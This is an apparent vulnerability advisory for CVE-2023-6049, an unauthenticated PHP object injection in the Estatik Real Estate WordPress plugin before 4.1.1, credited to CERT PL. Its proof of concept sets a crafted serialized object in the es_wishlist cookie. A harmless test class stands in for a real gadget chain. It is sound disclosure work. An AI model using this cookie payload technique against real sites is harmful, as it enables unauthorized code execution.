Estatik Real Estate Plugin < 4.1.1 – Unauthenticated PHP Object Injection | CVE 2023-6049 | Plugin Vulnerabilities

Description

The plugin unserializes user input via some of its cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget chain is present on the blog

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:
class Evil {
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}

Then, run the below command in the developer console of the web browser while being on the blog as unauthenticated and reload the page to see the Arbitrary deserialization message.

document.cookie='es_wishlist=O:4:"Evil":0:{}'

Affects Plugins

Fixed in 4.1.1

References

CVE

Classification

Type

OBJECT INJECTION

OWASP top 10

A8: Insecure Deserialization

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

8cfd8c1f-2834-4a94-a3fa-c0cfbe78a8b7

Timeline

Publicly Published

2023-12-25 (about 1 year ago)

Added

2023-12-25 (about 1 year ago)

Last Updated

2023-12-25 (about 1 year ago)

Other

Published

Title

Published

2025-01-10

Title

GiveWP < 3.19.3 - Unauthenticated PHP Object Injection

Published

2025-08-19

Title

BugsPatrol <= 1.5.0 - Unauthenticated PHP Object Injection

Published

2024-11-20

Title

Grid View Gallery <= 1.0 - Authenticated (Editor+) PHP Object Injection

Published

2025-06-09

Title

CozyStay < 1.7.1 - Unauthenticated PHP Object Injection

Published

2022-10-17

Title

Role Based Pricing for WooCommerce < 1.6.3 - Subscriber+ PHAR Deserialization